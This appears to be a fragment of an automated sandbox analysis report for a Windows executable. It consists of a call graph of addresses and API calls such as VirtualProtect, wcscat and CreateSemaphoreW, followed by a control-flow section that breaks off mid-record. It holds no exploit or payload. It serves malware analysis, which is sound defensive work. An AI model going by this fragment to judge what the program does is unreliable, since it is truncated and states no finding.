API calls 11056->11058 11057->11056 11060 7ff6b2983a74 11058->11060 11060->11060 11063 7ff6b298266f 11061->11063 11062 7ff6b2982776 11062->11051 11063->11062 11064 7ff6b2981880 7 API calls 11063->11064 11065 7ff6b2981900 2 API calls 11063->11065 11064->11063 11065->11063 11069 7ff6b2987d10 11070 7ff6b2987d42 11069->11070 11071 7ff6b2987d1e 11069->11071 11071->11070 11072 7ff6b2987d29 strcmp 11071->11072 11072->11070 10618 7ff6b297e810 10619 7ff6b297e819 10618->10619 10620 7ff6b297e826 abort 10618->10620 11073 7ff6b2981310 11074 7ff6b2981319 localeconv 11073->11074 11075 7ff6b29811b1 11073->11075 11076 7ff6b29863e0 6 API calls 11074->11076 11077 7ff6b2981353 11076->11077 11078 7ff6b2987b10 11079 7ff6b2987d70 strcmp 11078->11079 11080 7ff6b2987b54 11079->11080 11081 7ff6b2987d70 strcmp 11080->11081 11082 7ff6b2987b61 11080->11082 11081->11082 10621 7ff6b2981164 10622 7ff6b2981004 10621->10622 10623 7ff6b2980ff1 10621->10623 10625 7ff6b29800d0 15 API calls 10622->10625 10624 7ff6b29800d0 15 API calls 10623->10624 10624->10622 10626 7ff6b2981193 10625->10626 10626->10626 11083 7ff6b2974a60 11084 7ff6b29746e0 _errno 11083->11084 11085 7ff6b2974a82 strlen 11084->11085 11086 7ff6b2974a8f 11085->11086 10627 7ff6b2978160 10628 7ff6b297816e 10627->10628 10629 7ff6b2974830 strlen 10628->10629 10630 7ff6b297817d 10629->10630 10631 7ff6b2974830 strlen 10630->10631 10632 7ff6b297a5d9 10631->10632 10633 7ff6b29746e0 _errno 10632->10633 10634 7ff6b297a5f4 strlen 10633->10634 10637 7ff6b297a604 10634->10637 10635 7ff6b2974830 strlen 10636 7ff6b297a678 10635->10636 10637->10635 10638 7ff6b2986560 ___mb_cur_max_func ___lc_codepage_func 10639 7ff6b2986270 4 API calls 10638->10639 10640 7ff6b29865ad 10639->10640 11087 7ff6b2980c60 11088 7ff6b2980c77 11087->11088 11089 7ff6b2980d85 11087->11089 11095 7ff6b2980bc4 11088->11095 11096 7ff6b297f5d0 11088->11096 11091 7ff6b2980da6 11089->11091 11092 7ff6b2981542 wcslen 11089->11092 11093 7ff6b297f3e0 2 API calls 11091->11093 11094 7ff6b2980dbe 11093->11094 11097 7ff6b297f5f5 11096->11097 11098 7ff6b297f610 strlen 11096->11098 11097->11098 11098->11097 11099 7ff6b297de60 11100 7ff6b297de71 11099->11100 11101 7ff6b297de80 EnterCriticalSection 11099->11101 11102 7ff6b297deb3 LeaveCriticalSection 11101->11102 11105 7ff6b297de99 11101->11105 11103 7ff6b297dec0 11102->11103 11105->11102 11106 7ff6b297de9f free LeaveCriticalSection 11105->11106 11106->11103 10641 7ff6b2986769 RtlCaptureContext 10645 7ff6b2986170 ___lc_codepage_func ___mb_cur_max_func 10646 7ff6b29861aa 10645->10646 10647 7ff6b29861a0 10645->10647 10648 7ff6b29861a5 10647->10648 10651 7ff6b2986200 10647->10651 10648->10646 10649 7ff6b29860b0 2 API calls 10648->10649 10649->10648 10650 7ff6b29860b0 2 API calls 10650->10651 10651->10646 10651->10650 10652 7ff6b2985570 10653 7ff6b2985585 10652->10653 10654 7ff6b2985590 DeleteCriticalSection 10652->10654 11110 7ff6b297d270 11111 7ff6b297d279 11110->11111 11112 7ff6b297d283 11110->11112 11111->11112 11113 7ff6b297c2f0 4 API calls 11111->11113 11113->11112 10655 7ff6b298356e 10656 7ff6b2981900 2 API calls 10655->10656 10657 7ff6b298358b 10656->10657 10657->10657 10662 7ff6b2986741 SetUnhandledExceptionFilter 11114 7ff6b2973a40 11115 7ff6b2972ed0 4 API calls 11114->11115 11116 7ff6b2973a61 11115->11116 11120 7ff6b2973b37 11116->11120 11121 7ff6b2971720 11116->11121 11118 7ff6b2973ba2 11118->11120 11137 7ff6b2973810 11118->11137 11126 7ff6b29717a0 11121->11126 11122 7ff6b2971e30 11123 7ff6b2971e50 wcslen 11122->11123 11125 7ff6b2971e80 11123->11125 11124 7ff6b297190c wcsncmp 11124->11126 11126->11122 11126->11124 11127 7ff6b297198e 11126->11127 11127->11125 11128 7ff6b29719e1 memset 11127->11128 11129 7ff6b2971a1c 11128->11129 11130 7ff6b2971a9f wcscpy wcscat wcslen 11129->11130 11131 7ff6b2971e08 11130->11131 11132 7ff6b2971ad2 wcslen 11130->11132 11133 7ff6b2971af6 wcslen 11131->11133 11134 7ff6b2971b07 11131->11134 11132->11133 11132->11134 11133->11134 11134->11123 11135 7ff6b2971b2e wcslen wcslen 11134->11135 11136 7ff6b2971bd6 11135->11136 11136->11118 11138 7ff6b2973824 11137->11138 11143 7ff6b2973750 memset 11138->11143 11140 7ff6b2973851 11142 7ff6b2973855 11140->11142 11145 7ff6b29737c0 memset 11140->11145 11142->11120 11144 7ff6b2973789 11143->11144 11144->11140 11146 7ff6b29737f7 11145->11146 11146->11142 10663 7ff6b297e740 10664 7ff6b297e74a 10663->10664 10665 7ff6b297e758 10663->10665 10665->10664 10666 7ff6b297e765 ReleaseSemaphore 10665->10666 10666->10664 10667 7ff6b2983d40 10668 7ff6b29856c0 5 API calls 10667->10668 10669 7ff6b2983d48 10668->10669 10670 7ff6b2983ab0 6 API calls 10669->10670 10671 7ff6b2983d70 10670->10671 11147 7ff6b297d440 11148 7ff6b297d45f 11147->11148 11149 7ff6b297d496 fprintf 11148->11149 11150 7ff6b2988040 11151 7ff6b2988054 malloc 11150->11151 11152 7ff6b2988061 11151->11152 11154 7ff6b2988067 11151->11154 11153 7ff6b2988075 11155 7ff6b2988100 16 API calls 11153->11155 11154->11151 11154->11153 11156 7ff6b298807f 11155->11156 11157 7ff6b2988520 16 API calls 11156->11157 11158 7ff6b29880a3 malloc 11157->11158 11159 7ff6b29880dd 11158->11159 11160 7ff6b29880c7 11158->11160 11161 7ff6b2987570 16 API calls 11159->11161 11162 7ff6b29880e7 11161->11162 11162->11160 11163 7ff6b2987ff0 16 API calls 11162->11163 11164 7ff6b29880f4 11163->11164 11165 7ff6b297e640 CreateSemaphoreW 10672 7ff6b2983154 10673 7ff6b298317b 10672->10673 10674 7ff6b2983760 10672->10674 10683 7ff6b2981fb0 10673->10683 10676 7ff6b2981fb0 18 API calls 10674->10676 10677 7ff6b298377a 10676->10677 10677->10677 10678 7ff6b29830e4 10679 7ff6b29835a7 10678->10679 10680 7ff6b2981650 10 API calls 10678->10680 10681 7ff6b2981900 2 API calls 10679->10681 10680->10678 10682 7ff6b29835c8 10681->10682 10684 7ff6b2981fc4 10683->10684 10685 7ff6b2982004 10684->10685 10686 7ff6b2982040 10684->10686 10688 7ff6b2981a80 9 API calls 10685->10688 10687 7ff6b29817e0 10 API calls 10686->10687 10689 7ff6b298204f 10687->10689 10690 7ff6b2982013 10688->10690 10691 7ff6b2983b40 5 API calls 10689->10691 10693 7ff6b2983b40 5 API calls 10690->10693 10692 7ff6b2982057 10691->10692 10692->10678 10694 7ff6b2982037 10693->10694 10694->10678 11166 7ff6b2973650 wcslen 11167 7ff6b29736be 11166->11167 10695 7ff6b2987950 10696 7ff6b2987d70 strcmp 10695->10696 10697 7ff6b2987969 10696->10697 11168 7ff6b2986450 ___lc_codepage_func ___mb_cur_max_func 11169 7ff6b2986491 11168->11169 11174 7ff6b29864a9 11168->11174 11170 7ff6b29864a2 11169->11170 11171 7ff6b2986510 11169->11171 11169->11174 11173 7ff6b2986270 4 API calls 11170->11173 11170->11174 11172 7ff6b2986270 4 API calls 11171->11172 11171->11174 11172->11171 11173->11170 11175 7ff6b2981050 11176 7ff6b2981059 11175->11176 11177 7ff6b297f5d0 strlen 11176->11177 11178 7ff6b2981064 11177->11178 11178->11178 11179 7ff6b2978a9d 11180 7ff6b2978ab8 11179->11180 11181 7ff6b29746e0 _errno 11180->11181 11182 7ff6b2979e34 strlen 11181->11182 11186 7ff6b2979e48 11182->11186 11183 7ff6b297a284 11184 7ff6b29746e0 _errno 11185 7ff6b2979ef3 strlen 11184->11185 11185->11186 11186->11183 11186->11184 11187 7ff6b2985ea0 11188 7ff6b29855c0 6 API calls 11187->11188 11189 7ff6b2985ebc 11188->11189 10698 7ff6b29831aa 10699 7ff6b2983603 10698->10699 10702 7ff6b29831b8 10698->10702 10700 7ff6b2981900 2 API calls 10699->10700 10699->10702 10701 7ff6b2983623 10700->10701 11190 7ff6b29878aa 11191 7ff6b2988330 16 API calls 11190->11191 11192 7ff6b29878b2 11191->11192 11195 7ff6b297eb70 RtlCaptureContext RtlUnwindEx abort 11192->11195 10703 7ff6b29867a9 GetLastError 10000 7ff6b29714b0 10003 7ff6b2971180 10000->10003 10002 7ff6b29714c6 10004 7ff6b29711b4 10003->10004 10005 7ff6b2971450 GetStartupInfoA 10003->10005 10006 7ff6b29711dc Sleep 10004->10006 10010 7ff6b29711f1 10004->10010 10007 7ff6b2971395 10005->10007 10006->10004 10007->10002 10008 7ff6b297141c _initterm 10009 7ff6b2971224 10008->10009 10020 7ff6b297d7c0 10009->10020 10010->10007 10010->10008 10010->10009 10012 7ff6b297124c SetUnhandledExceptionFilter 10013 7ff6b297126f 10012->10013 10014 7ff6b29712f3 malloc 10013->10014 10015 7ff6b297135c 10014->10015 10016 7ff6b297131a strlen malloc memcpy 10014->10016 10042 7ff6b29885d0 10015->10042 10018 7ff6b2971357 10016->10018 10018->10015 10021 7ff6b297d7e2 10020->10021 10023 7ff6b297d7f3 10020->10023 10021->10012 10022 7ff6b297daa2 10022->10021 10024 7ff6b297daab 10022->10024 10023->10021 10023->10022 10038 7ff6b297d86b 10023->10038 10025 7ff6b297d5c0 8 API calls 10024->10025 10028 7ff6b297daf5 10024->10028 10025->10024 10026 7ff6b297db22 10027 7ff6b297d550 8 API calls 10026->10027 10030 7ff6b297db2e 10027->10030 10125 7ff6b297d550 10028->10125 10030->10012 10031 7ff6b297d5c0 8 API calls 10036 7ff6b297d8c1 10031->10036 10032 7ff6b297db0e 10034 7ff6b297d550 8 API calls 10032->10034 10033 7ff6b297da8c 10035 7ff6b297d5c0 8 API calls 10033->10035 10034->10026 10037 7ff6b297da9d 10035->10037 10036->10031 10036->10038 10040 7ff6b297d943 10036->10040 10094 7ff6b297d5c0 10036->10094 10037->10012 10038->10021 10038->10026 10038->10028 10038->10032 10038->10033 10038->10036 10038->10040 10040->10021 10041 7ff6b297d972 VirtualProtect 10040->10041 10041->10040 10043 7ff6b29885e6 10042->10043 10044 7ff6b2989b74 10043->10044 10045 7ff6b29886fc wcslen 10043->10045 10046 7ff6b2988763 10045->10046 10047 7ff6b298888c memset 10046->10047 10048 7ff6b29888da 10047->10048 10155 7ff6b2972b30 wcslen 10048->10155 10050 7ff6b2988a0a 10160 7ff6b2972b00 10050->10160 10052 7ff6b2988a26 memset 10053 7ff6b2988a5e 10052->10053 10054 7ff6b2972b00 wcscat 10053->10054 10055 7ff6b2988ae2 memset 10054->10055 10056 7ff6b2988b73 10055->10056 10057 7ff6b2972b00 wcscat 10056->10057 10058 7ff6b2988c86 memset 10057->10058 10059 7ff6b2988ccb 10058->10059 10060 7ff6b2972b30 3 API calls 10059->10060 10061 7ff6b2988e24 10060->10061 10062 7ff6b2972b00 wcscat 10061->10062 10063 7ff6b2988e40 memset 10062->10063 10064 7ff6b2988e85 10063->10064 10064->10044 10065 7ff6b2972b30 3 API calls 10064->10065 10066 7ff6b2988fa3 10065->10066 10067 7ff6b2972b00 wcscat 10066->10067 10068 7ff6b2988fb5 memset 10067->10068 10069 7ff6b2988ff8 10068->10069 10070 7ff6b2972b00 wcscat 10069->10070 10071 7ff6b298907e memset 10070->10071 10072 7ff6b29890d0 10071->10072 10073 7ff6b2972b00 wcscat 10072->10073 10074 7ff6b2989181 10073->10074 10164 7ff6b2971ea0 10074->10164 10076 7ff6b2989186 10178 7ff6b2973010 10076->10178 10078 7ff6b2989410 _wcsicmp 10093 7ff6b2989356 10078->10093 10081 7ff6b2989703 memcpy 10083 7ff6b2989724 memcpy 10081->10083 10081->10093 10082 7ff6b2989458 memcpy 10084 7ff6b2989479 memcpy 10082->10084 10082->10093 10083->10093 10084->10093 10086 7ff6b2972990 13 API calls 10086->10093 10087 7ff6b29898cc memcpy 10088 7ff6b29898ed memcpy 10087->10088 10087->10093 10088->10093 10089 7ff6b2989b58 10090 7ff6b29731c0 24 API calls 10089->10090 10090->10044 10091 7ff6b2989b41 10189 7ff6b29731c0 10091->10189 10093->10078 10093->10081 10093->10082 10093->10086 10093->10087 10093->10089 10093->10091 10181 7ff6b2973310 10093->10181 10184 7ff6b2972a50 10093->10184 10187 7ff6b29734f0 wcslen 10093->10187 10095 7ff6b297d750 10094->10095 10097 7ff6b297d5e2 10094->10097 10095->10038 10096 7ff6b297d68e 10096->10038 10096->10096 10097->10096 10098 7ff6b297d7a2 10097->10098 10100 7ff6b297d64c VirtualQuery 10097->10100 10099 7ff6b297d550 4 API calls 10098->10099 10108 7ff6b297d7b1 10099->10108 10101 7ff6b297d67a 10100->10101 10102 7ff6b297d785 10100->10102 10101->10096 10105 7ff6b297d700 VirtualProtect 10101->10105 10102->10098 10104 7ff6b297d550 4 API calls 10102->10104 10103 7ff6b297d7e2 10103->10038 10104->10098 10105->10096 10106 7ff6b297d73c GetLastError 10105->10106 10106->10095 10107 7ff6b297d550 4 API calls 10106->10107 10107->10095 10108->10103 10111 7ff6b297daa2 10108->10111 10120 7ff6b297d86b 10108->10120 10109 7ff6b297d5c0 4 API calls 10109->10111 10110 7ff6b297db22 10112 7ff6b297d550 4 API calls 10110->10112 10111->10103 10111->10109 10113 7ff6b297daf5 10111->10113 10115 7ff6b297db2e 10112->10115 10114 7ff6b297d550 4 API calls 10113->10114 10116 7ff6b297db0e 10114->10116 10115->10038 10118 7ff6b297d550 4 API calls 10116->10118 10117 7ff6b297da8c 10119 7ff6b297d5c0 4 API calls 10117->10119 10118->10110 10121 7ff6b297da9d 10119->10121 10120->10103 10120->10110 10120->10113 10120->10116 10120->10117 10122 7ff6b297d943 10120->10122 10123 7ff6b297d5c0 VirtualQuery VirtualProtect GetLastError VirtualProtect 10120->10123 10121->10038 10122->10103 10124 7ff6b297d972 VirtualProtect 10122->10124 10123->10120 10124->10122 10126 7ff6b297d57c 10125->10126 10127 7ff6b297d7a2 10126->10127 10128 7ff6b297d68e 10126->10128 10130 7ff6b297d64c VirtualQuery 10126->10130 10129 7ff6b297d550 4 API calls 10127->10129 10128->10032 10138 7ff6b297d7b1 10129->10138 10131 7ff6b297d67a 10130->10131 10132 7ff6b297d785 10130->10132 10131->10128 10135 7ff6b297d700 VirtualProtect 10131->10135 10132->10127 10134 7ff6b297d550 4 API calls 10132->10134 10133 7ff6b297d7e2 10133->10032 10134->10127 10135->10128 10136 7ff6b297d73c GetLastError 10135->10136 10136->10128 10137 7ff6b297d550 4 API calls 10136->10137 10137->10128 10138->10133 10141 7ff6b297daa2 10138->10141 10151 7ff6b297d86b 10138->10151 10139 7ff6b297d5c0 4 API calls 10139->10141 10140 7ff6b297db22 10142 7ff6b297d550 4 API calls 10140->10142 10141->10133 10141->10139 10143 7ff6b297daf5 10141->10143 10145 7ff6b297db2e 10142->10145 10144 7ff6b297d550 4 API calls 10143->10144 10147 7ff6b297db0e 10144->10147 10145->10032 10146 7ff6b297d5c0 VirtualQuery VirtualProtect GetLastError VirtualProtect 10146->10151 10149 7ff6b297d550 4 API calls 10147->10149 10148 7ff6b297da8c 10150 7ff6b297d5c0 4 API calls 10148->10150 10149->10140 10152 7ff6b297da9d 10150->10152 10151->10133 10151->10140 10151->10143 10151->10146 10151->10147 10151->10148 10153 7ff6b297d943 10151->10153 10152->10032 10153->10133 10154 7ff6b297d972 VirtualProtect 10153->10154 10154->10153 10156 7ff6b2972b63 _wcsnicmp 10155->10156 10157 7ff6b2972b4e 10155->10157 10158 7ff6b2972b75 10156->10158 10159 7ff6b2972b50 wcslen 10156->10159 10157->10050 10158->10050 10159->10156 10159->10157 10161 7ff6b2972b11 10160->10161 10162 7ff6b29866d8 wcscat 10161->10162 10162->10052 10163 7ff6b2995483 10162->10163 10165 7ff6b2971f0f 10164->10165 10166 7ff6b2971f18 memcpy 10165->10166 10167 7ff6b2971f43 10165->10167 10166->10167 10168 7ff6b297208d wcslen memcpy 10167->10168 10169 7ff6b29720bd memcpy 10168->10169 10170 7ff6b29720e8 10168->10170 10169->10170 10171 7ff6b297233c wcslen 10170->10171 10177 7ff6b2972377 10171->10177 10172 7ff6b2972686 _wcsnicmp 10174 7ff6b297291f 10172->10174 10172->10177 10173 7ff6b297270c _wcsnicmp 10173->10174 10173->10177 10174->10076 10175 7ff6b2972792 _wcsnicmp 10175->10174 10175->10177 10176 7ff6b29728fc wcsstr 10176->10174 10176->10177 10177->10172 10177->10173 10177->10174 10177->10175 10177->10176 10194 7ff6b2972ba0 memset 10178->10194 10180 7ff6b297304c 10180->10093 10182 7ff6b2972ba0 4 API calls 10181->10182 10183 7ff6b297333c 10182->10183 10183->10093 10185 7ff6b2972a64 wcslen 10184->10185 10186 7ff6b2972ad0 10184->10186 10185->10186 10186->10093 10188 7ff6b297355c 10187->10188 10188->10093 10197 7ff6b2972d70 wcslen 10189->10197 10192 7ff6b2972ba0 4 API calls 10193 7ff6b2973203 10192->10193 10193->10089 10195 7ff6b2972be8 10194->10195 10196 7ff6b2972c68 wcscpy wcscat wcslen 10195->10196 10196->10180 10198 7ff6b2972ea6 10197->10198 10199 7ff6b2972da9 10197->10199 10201 7ff6b2972e92 10198->10201 10205 7ff6b2989d10 10198->10205 10199->10201 10202 7ff6b2972df5 wcscpy 10199->10202 10201->10192 10204 7ff6b2972ba0 4 API calls 10202->10204 10204->10199 10212 7ff6b2988100 malloc 10205->10212 10209 7ff6b2989d42 10210 7ff6b2989d61 malloc 10209->10210 10229 7ff6b297e560 CreateSemaphoreW 10209->10229 10210->10209 10213 7ff6b298811d 10212->10213 10214 7ff6b2988138 10212->10214 10219 7ff6b2988520 10213->10219 10230 7ff6b2987570 10214->10230 10220 7ff6b2988535 10219->10220 10292 7ff6b297eb20 RaiseException 10220->10292 10222 7ff6b2988559 10223 7ff6b2988150 16 API calls 10222->10223 10224 7ff6b2988561 10223->10224 10225 7ff6b2987ff0 16 API calls 10224->10225 10226 7ff6b2988566 10225->10226 10293 7ff6b297e900 10226->10293 10229->10209 10238 7ff6b298758a 10230->10238 10231 7ff6b29875f6 10231->10213 10239 7ff6b2987ff0 10231->10239 10233 7ff6b298766c 10253 7ff6b29878c0 10233->10253 10238->10231 10238->10233 10242 7ff6b297e610 10238->10242 10245 7ff6b29878f0 10238->10245 10250 7ff6b297e5a0 10238->10250 10258 7ff6b2986ca0 10239->10258 10243 7ff6b297e639 10242->10243 10244 7ff6b297e61f ReleaseSemaphore 10242->10244 10243->10238 10244->10243 10246 7ff6b2988100 16 API calls 10245->10246 10247 7ff6b29878fe 10246->10247 10248 7ff6b2988520 16 API calls 10247->10248 10249 7ff6b298791e 10248->10249 10249->10238 10251 7ff6b297e5c0 WaitForSingleObject 10250->10251 10252 7ff6b297e5ae 10250->10252 10251->10252 10252->10238 10254 7ff6b2988100 16 API calls 10253->10254 10255 7ff6b29878ce 10254->10255 10256 7ff6b2988520 16 API calls 10255->10256 10257 7ff6b29878ee 10256->10257 10259 7ff6b2986ca6 abort 10258->10259 10262 7ff6b2988150 10259->10262 10264 7ff6b298815d 10262->10264 10263 7ff6b2986cb3 abort 10264->10263 10265 7ff6b2987ff0 16 API calls 10264->10265 10266 7ff6b29881cd 10265->10266 10267 7ff6b29881e2 10266->10267 10268 7ff6b2988150 16 API calls 10266->10268 10269 7ff6b2987ff0 16 API calls 10267->10269 10270 7ff6b29881fa 10267->10270 10268->10267 10269->10270 10271 7ff6b2986ca0 16 API calls 10270->10271 10272 7ff6b2988203 10271->10272 10273 7ff6b2988150 16 API calls 10272->10273 10274 7ff6b2988222 10273->10274 10288 7ff6b2986cc0 10274->10288 10289 7ff6b2986cc6 10288->10289 10290 7ff6b2987ff0 16 API calls 10289->10290 10291 7ff6b2986ccb 10290->10291 10292->10222 10294 7ff6b297e9ea 10293->10294 10297 7ff6b297e92a 10293->10297 10294->10209 10295 7ff6b297e9e0 10295->10294 10296 7ff6b297eaf8 RtlUnwindEx abort 10295->10296 10297->10294 10297->10295 10299 7ff6b297ea50 10297->10299 10300 7ff6b297e97b 10297->10300 10298 7ff6b297e9d4 abort 10298->10295 10299->10294 10299->10298 10302 7ff6b297eaa6 RtlUnwindEx 10299->10302 10300->10294 10300->10298 10301 7ff6b297e9a3 RaiseException 10300->10301 10301->10298 10302->10298 10704 7ff6b297d3b0 10705 7ff6b297d3c2 10704->10705 10707 7ff6b297d3d2 10705->10707 10709 7ff6b297df00 10705->10709 10708 7ff6b297d417 10710 7ff6b297dfa5 10709->10710 10714 7ff6b297df0e 10709->10714 10711 7ff6b297dfe0 InitializeCriticalSection 10710->10711 10712 7ff6b297dfaf 10710->10712 10711->10712 10712->10708 10713 7ff6b297df12 10713->10708 10714->10713 10715 7ff6b297df81 DeleteCriticalSection 10714->10715 10716 7ff6b297df70 free 10714->10716 10715->10713 10716->10715 10716->10716 11201 7ff6b297e8b0 RtlLookupFunctionEntry 11202 7ff6b297e8c7 11201->11202 10717 7ff6b2986779 RaiseException 10718 7ff6b29952e4 10717->10718 11203 7ff6b2983477 11204 7ff6b298349e 11203->11204 11208 7ff6b29834b1 11203->11208 11209 7ff6b29824e0 11204->11209 11205 7ff6b29824e0 20 API calls 11207 7ff6b29837b8 11205->11207 11207->11207 11208->11205 11210 7ff6b29824f9 11209->11210 11211 7ff6b2982604 11210->11211 11212 7ff6b2982534 11210->11212 11213 7ff6b29817e0 10 API calls 11211->11213 11214 7ff6b29825a0 11212->11214 11215 7ff6b2982548 11212->11215 11216 7ff6b2982613 11213->11216 11217 7ff6b29825af 11214->11217 11218 7ff6b29825a4 strlen 11214->11218 11219 7ff6b2982624 strlen 11215->11219 11220 7ff6b2982550 11215->11220 11221 7ff6b2983b40 5 API calls 11216->11221 11223 7ff6b2982360 9 API calls 11217->11223 11218->11217 11219->11220 11224 7ff6b2981a80 9 API calls 11220->11224 11222 7ff6b298261b 11221->11222 11222->11208 11225 7ff6b29825c4 11223->11225 11227 7ff6b2982567 11224->11227 11226 7ff6b2983b40 5 API calls 11225->11226 11228 7ff6b29825cc 11226->11228 11229 7ff6b2983b40 5 API calls 11227->11229 11228->11208 11230 7ff6b2982592 11229->11230 11230->11208 10719 7ff6b2973580 wcslen wcslen 10720 7ff6b2973613 10719->10720 10721 7ff6b297d380 10722 7ff6b297d389 10721->10722 10723 7ff6b297d38d 10722->10723 10724 7ff6b297df00 3 API calls 10722->10724 10725 7ff6b297d3a5 10724->10725 10726 7ff6b2980d80 10727 7ff6b2980d85 10726->10727 10728 7ff6b2980da6 10727->10728 10729 7ff6b2981542 wcslen 10727->10729 10730 7ff6b297f3e0 2 API calls 10728->10730 10731 7ff6b2980dbe 10730->10731 11231 7ff6b297e080 strlen 11232 7ff6b297e110 11231->11232 11235 7ff6b297e095 11231->11235 11233 7ff6b297e0fe 11234 7ff6b297e0e9 strncmp 11234->11233 11234->11235 11235->11232 11235->11233 11235->11234 11236 7ff6b2980e80 11238 7ff6b2980e9c 11236->11238 11237 7ff6b2981277 11238->11237 11239 7ff6b29806e0 8 API calls 11238->11239 11239->11238 11240 7ff6b297e680 GetCurrentThreadId 11241 7ff6b297e697 11240->11241 11242 7ff6b297e6af 11240->11242 11241->11242 11243 7ff6b297e69c WaitForSingleObject 11241->11243 11243->11242 11244 7ff6b2989c90 11245 7ff6b2988100 16 API calls 11244->11245 11246 7ff6b2989c9e 11245->11246 11247 7ff6b2988520 16 API calls 11246->11247 11248 7ff6b2989cc2 11247->11248 11249 7ff6b2988100 16 API calls 11248->11249 11250 7ff6b2989cde 11249->11250 11251 7ff6b2988520 16 API calls 11250->11251 11252 7ff6b2989d02 11251->11252 10732 7ff6b2986789 LeaveCriticalSection 10733 7ff6b297db86 10734 7ff6b297dbb1 10733->10734 10735 7ff6b297dc13 10734->10735 10736 7ff6b297dc32 signal 10734->10736 10737 7ff6b297dbbf 10734->10737 10743 7ff6b297dc05 10734->10743 10738 7ff6b297dc20 10735->10738 10740 7ff6b297dbfc 10735->10740 10741 7ff6b297dc70 10735->10741 10739 7ff6b297dc48 signal 10736->10739 10736->10740 10737->10741 10742 7ff6b297dbd0 10737->10742 10737->10743 10738->10736 10738->10740 10738->10743 10739->10743 10740->10743 10744 7ff6b297dd20 signal 10740->10744 10741->10740 10741->10743 10745 7ff6b297dc7e signal 10741->10745 10742->10740 10742->10743 10746 7ff6b297dbe6 signal 10742->10746 10744->10743 10745->10740 10747 7ff6b297dd39 signal 10745->10747 10746->10740 10748 7ff6b297dd50 signal 10746->10748 10747->10743 10748->10743 11253 7ff6b2978695 11254 7ff6b29786a1 11253->11254 11255 7ff6b2974830 strlen 11254->11255 11256 7ff6b297a0ff 11255->11256 11257 7ff6b29746e0 _errno 11256->11257 11258 7ff6b297a116 strlen 11257->11258 11259 7ff6b297a12a 11258->11259 11260 7ff6b2978e91 11261 7ff6b297a4dd 11260->11261 11264 7ff6b29786a8 11260->11264 11262 7ff6b2974830 strlen 11261->11262 11263 7ff6b297a4e9 11262->11263 11264->11263 11265 7ff6b2974830 strlen 11264->11265 11266 7ff6b297a0ff 11265->11266 11267 7ff6b29746e0 _errno 11266->11267 11268 7ff6b297a116 strlen 11267->11268 11269 7ff6b297a12a 11268->11269 10749 7ff6b297e790 CloseHandle 10750 7ff6b2983590 10751 7ff6b29835a7 10750->10751 10752 7ff6b2981900 2 API calls 10751->10752 10753 7ff6b29835c8 10752->10753 10754 7ff6b2983d90 10755 7ff6b2983ab0 6 API calls 10754->10755 10756 7ff6b2983d71 10755->10756 10757 7ff6b2986d90 10758 7ff6b2986dc5 10757->10758 10772 7ff6b2986e3e 10757->10772 10758->10772 10774 7ff6b2986df2 10758->10774 10779 7ff6b2986890 10758->10779 10759 7ff6b2986e17 10776 7ff6b297e830 10759->10776 10760 7ff6b2986890 2 API calls 10760->10774 10763 7ff6b2986e29 10765 7ff6b297e830 abort 10763->10765 10765->10772 10767 7ff6b2986a90 abort 10767->10774 10768 7ff6b2987ff0 16 API calls 10768->10774 10770 7ff6b2986b40 abort 10770->10774 10771 7ff6b2987348 abort 10771->10774 10774->10759 10774->10760 10774->10767 10774->10768 10774->10770 10774->10771 10774->10772 10775 7ff6b2988150 16 API calls 10774->10775 10790 7ff6b2986980 10774->10790 10795 7ff6b2987f10 10774->10795 10775->10774 10777 7ff6b297e839 10776->10777 10778 7ff6b297e846 abort 10776->10778 10777->10763 10778->10763 10780 7ff6b29868a8 10779->10780 10781 7ff6b2986a90 abort 10780->10781 10784 7ff6b29868c0 10780->10784 10782 7ff6b298695d 10781->10782 10798 7ff6b2986b40 10782->10798 10785 7ff6b2986a90 10784->10785 10786 7ff6b2986ad2 10785->10786 10788 7ff6b2986a99 10785->10788 10786->10774 10787 7ff6b2986af0 10788->10786 10788->10787 10789 7ff6b2986ae5 abort 10788->10789 10789->10787 10793 7ff6b29869b0 10790->10793 10791 7ff6b2986b40 abort 10791->10793 10792 7ff6b2986a54 abort 10792->10793 10793->10791 10793->10792 10794 7ff6b2986a2a 10793->10794 10794->10774 10796 7ff6b2986cc0 16 API calls 10795->10796 10797 7ff6b2987f23 10796->10797 10799 7ff6b2986b51 10798->10799 10801 7ff6b2986b5e 10798->10801 10800 7ff6b2986c8f abort 10799->10800 10799->10801 10801->10784 11270 7ff6b297e490 TlsAlloc 11271 7ff6b297e4c0 GetLastError 11270->11271 11272 7ff6b297e4a7 11270->11272 11273 7ff6b297ec90 RtlCaptureContext 11274 7ff6b297edb9 RtlLookupFunctionEntry 11273->11274 11275 7ff6b297eddc 11274->11275 11276 7ff6b297ed50 RtlVirtualUnwind 11274->11276 11277 7ff6b297eda3 11276->11277 11277->11274 11277->11275 11278 7ff6b2980c90 11281 7ff6b2980cb2 11278->11281 11279 7ff6b297f3e0 2 API calls 11280 7ff6b29810f0 11279->11280 11281->11279 11282 7ff6b2980bc4 11281->11282

                                                                                        Executed Functions

                                                                                        Function 00007FF6B29885D0 Relevance: 56.5, APIs: 15, Strings: 22, Instructions: 994COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 7ff6b29885d0-7ff6b29886be call 7ff6b297e3e0 call 7ff6b297d350 5 7ff6b29886c0-7ff6b29886e2 call 7ff6b29714f0 0->5 6 7ff6b29886e7-7ff6b29886f6 0->6 5->6 8 7ff6b2989be2-7ff6b2989c76 6->8 9 7ff6b29886fc-7ff6b2988761 wcslen 6->9 10 7ff6b2988763-7ff6b2988785 call 7ff6b29714f0 9->10 11 7ff6b298878a-7ff6b2988791 9->11 10->11 13 7ff6b2988797-7ff6b2988810 11->13 14 7ff6b2988818-7ff6b29888d8 call 7ff6b29740bd call 7ff6b2973360 call 7ff6b2973c50 memset 11->14 13->14 21 7ff6b2988908-7ff6b2988917 14->21 22 7ff6b29888da-7ff6b2988903 call 7ff6b29714f0 14->22 24 7ff6b2988959-7ff6b2988986 21->24 25 7ff6b2988919-7ff6b2988951 21->25 22->21 26 7ff6b29889af-7ff6b29889be 24->26 27 7ff6b2988988-7ff6b29889aa call 7ff6b29714f0 24->27 25->24 29 7ff6b29889ff-7ff6b2988a5c call 7ff6b2972b30 call 7ff6b2972b00 memset 26->29 30 7ff6b29889c0-7ff6b29889f7 26->30 27->26 35 7ff6b2988a5e-7ff6b2988a87 call 7ff6b29714f0 29->35 36 7ff6b2988a8c-7ff6b2988a93 29->36 30->29 35->36 38 7ff6b2988ace-7ff6b2988b71 call 7ff6b2972b00 memset 36->38 39 